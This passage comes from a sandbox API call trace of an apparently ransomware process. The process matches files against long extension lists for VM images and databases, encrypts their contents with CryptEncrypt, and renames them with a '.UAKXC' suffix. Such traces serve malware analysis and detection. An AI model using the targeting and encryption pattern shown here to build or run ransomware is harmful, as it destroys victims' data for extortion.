lpSrch=".pvm") returned 0x0 [0140.693] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".vmem") returned 0x0 [0140.693] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".vmsn") returned 0x0 [0140.693] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".vmsd") returned 0x0 [0140.693] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".nvram") returned 0x0 [0140.693] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".vmx") returned 0x0 [0140.693] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".raw") returned 0x0 [0140.693] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".qcow2") returned 0x0 [0140.693] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".subvol") returned 0x0 [0140.693] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".bin") returned 0x0 [0140.693] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".vsv") returned 0x0 [0140.693] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".avhd") returned 0x0 [0140.693] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".vmrs") returned 0x0 [0140.693] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".vhdx") returned 0x0 [0140.694] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".avdx") returned 0x0 [0140.694] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".vmcx") returned 0x0 [0140.694] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpSrch=".iso") returned 0x0 [0140.694] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.694] WriteFile (in: hFile=0x6c4, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0140.696] WriteFile (in: hFile=0x6c4, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0140.696] SetEndOfFile (hFile=0x6c4) returned 1 [0140.697] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.697] ReadFile (in: hFile=0x6c4, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x186, lpOverlapped=0x0) returned 1 [0140.697] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.697] WriteFile (in: hFile=0x6c4, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x186, lpOverlapped=0x0) returned 1 [0140.697] CloseHandle (hObject=0x6c4) returned 1 [0140.699] GetProcessHeap () returned 0xea0000 [0140.699] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0140.699] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\ProgramData\\Microsoft Help\\Hx.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\Hx.hxn") returned="C:\\ProgramData\\Microsoft Help\\Hx.hxn" [0140.699] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\Hx.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\Hx.hxn.UAKXC" [0140.699] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\Hx.hxn" (normalized: "c:\\programdata\\microsoft help\\hx.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\Hx.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\hx.hxn.uakxc")) returned 1 [0140.700] GetProcessHeap () returned 0xea0000 [0140.700] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0140.700] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0140.700] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d08 | out: hHeap=0xea0000) returned 1 [0140.700] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0140.700] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0140.700] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0140.701] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn")) returned 0x2022 [0140.710] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0140.710] GetLastError () returned 0x0 [0140.710] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=326) returned 1 [0140.710] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0140.710] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0140.710] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".accde") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".accft") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".adb") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".ade") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".adf") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".adp") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".arc") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".ora") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".alf") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".ask") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".btr") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".cat") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".cma") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0140.711] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0140.712] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dad") returned 0x0 [0140.712] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0140.712] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0140.712] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".db") returned 0x0 [0140.712] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0140.712] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0140.712] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".db3") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dct") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".eco") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".edb") returned 0x0 [0140.714] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".epim") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".exb") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".fic") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".fol") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".frm") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".his") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".ib") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".idb") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".itw") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".jet") returned 0x0 [0140.715] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".maf") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".maq") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".mar") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".mas") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".mav") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".mud") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".myd") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0140.716] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".nv") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".odb") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".orx") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".owc") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".p96") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".p97") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".pan") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".qry") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".rod") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".scx") returned 0x0 [0140.717] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".sis") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".spq") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".sql") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".te") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".temx") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".tps") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".trc") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".trm") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".udb") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".udl") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".usr") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".v12") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".vis") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0140.718] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".xld") returned 0x0 [0140.719] StrStrIW 